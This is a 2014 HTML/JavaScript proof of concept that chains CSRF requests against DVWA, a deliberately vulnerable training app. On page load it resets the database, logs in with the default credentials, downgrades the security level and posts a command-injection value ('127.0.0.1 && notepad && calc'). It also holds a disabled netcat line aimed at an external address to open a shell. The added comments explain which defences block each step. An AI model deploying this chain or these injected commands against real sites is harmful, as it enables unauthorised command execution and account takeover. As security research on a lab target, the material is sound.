- <!-- There are multiple CSRF issues in DVWA. An attacker can chain these CSRF exploits to
- first reset the victim's DVWA database, then log the victim in with the default credentials the reset restores,
- next change the challenge level to low to make exploitation more probable,
- and finally send a command execution CSRF and possibly get a shell. :)
- *This PoC will open calculator as a demo execution in approximately 5 seconds.*
- The attacker just needs to know you have DVWA for this to work.
- Paulos Yibelo and Tabor N. Shiferaw 2014
- -->
- <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.0/jquery.min.js' type='text/javascript'>
- </script>
- <div id='loader'></div>
- <Script>
- //document.getElementById("loader").innerHTML = 'Loading...';
// Form bodies for the four chained POSTs, in the order they are sent.
// None of them carries an anti-CSRF token; the chain relies on the target
// accepting each state-changing request without one.

// Step 1: setup.php form field that requests the database reset.
var one = {
  create_db: 'whatever'
};

// Step 2: login form filled with the default admin credentials.
var two = {
  username: "admin",
  password: "password",
  Login: "Login"
};

// Step 3: security.php form that selects the "low" level.
var three = {
  security: "low",
  seclev_submit: "Submit"
};

// Step 4: `ip` field of the command-execution page. The value appends further
// commands to the address with `&&` (Windows demo: notepad and calc).
// Defensive note: validating this field as an IP address before it reaches a
// shell is what stops this class of input.
var four = {
  ip: "127.0.0.1 && notepad && calc",
  submit: "submit"
};
// Linux variant left disabled by the author:
//var four = {"ip":"127.0.0.1;netcat -l 15.11.11.x -p 4444","submit":"submit"};
/**
 * Step 1: POST the database-reset form to DVWA's setup page.
 *
 * Shows "Loading..." in #loader, sends `one` as the form body, and hands over
 * to dvwaLogin() only when jQuery invokes the success callback.
 *
 * Defensive note: the request carries no anti-CSRF token, so it only has an
 * effect where setup.php accepts a state-changing POST without one.
 */
function start_exploit() {
  var resetRequest = {
    type: "POST",
    url: "http://localhost/dvwa/setup.php",
    data: one
  };

  // The response body is ignored; success only chains the next step.
  resetRequest.success = function onResetDone() {
    dvwaLogin();
  };

  $("#loader").html("Loading...");
  $.ajax(resetRequest);
}
/**
 * Step 2: POST the login form with the default credentials held in `two`.
 *
 * Calls levelChanger() only when jQuery invokes the success callback; the
 * response body is not inspected, so a rejected login is not detected here.
 *
 * Defensive note: this is a login CSRF. A token on the login form and
 * changing the default password both break this step.
 */
function dvwaLogin() {
  var loginRequest = {
    type: "POST",
    url: "http://localhost/dvwa/login.php",
    data: two
  };

  loginRequest.success = function onLoginDone() {
    levelChanger();
  };

  $.ajax(loginRequest);
}
/**
 * Step 3: POST `three` to the security page to select the "low" level.
 *
 * Calls commandExecution() only when jQuery invokes the success callback.
 *
 * Defensive note: the level switch is a state-changing request sent without
 * an anti-CSRF token; requiring one on security.php stops the downgrade.
 */
function levelChanger() {
  var levelRequest = {
    type: "POST",
    url: "http://localhost/dvwa/security.php",
    data: three
  };

  levelRequest.success = function onLevelSet() {
    commandExecution();
  };

  $.ajax(levelRequest);
}
/**
 * Step 4: POST `four` to the command-execution page.
 *
 * On success the #loader element's text is set to "Loaded"; the response
 * itself is not read, so nothing here confirms what the server did.
 *
 * Defensive note: two controls apply to this request independently, namely an
 * anti-CSRF token on the form and strict validation of the `ip` field.
 */
function commandExecution() {
  var execRequest = {
    type: "POST",
    url: "http://localhost/dvwa/vulnerabilities/exec/index.php",
    data: four
  };

  execRequest.success = function onExecDone() {
    $("#loader").text("Loaded");
  };

  $.ajax(execRequest);
}
// Entry point: the chain starts as soon as this script block runs; nothing
// on the page waits for a click or any other user action.
start_exploit();
- </script>
- <!-- check out http://paulosyibelo.blogspot.com/2014/09/dvwa-unintended-security-issues.html for more -->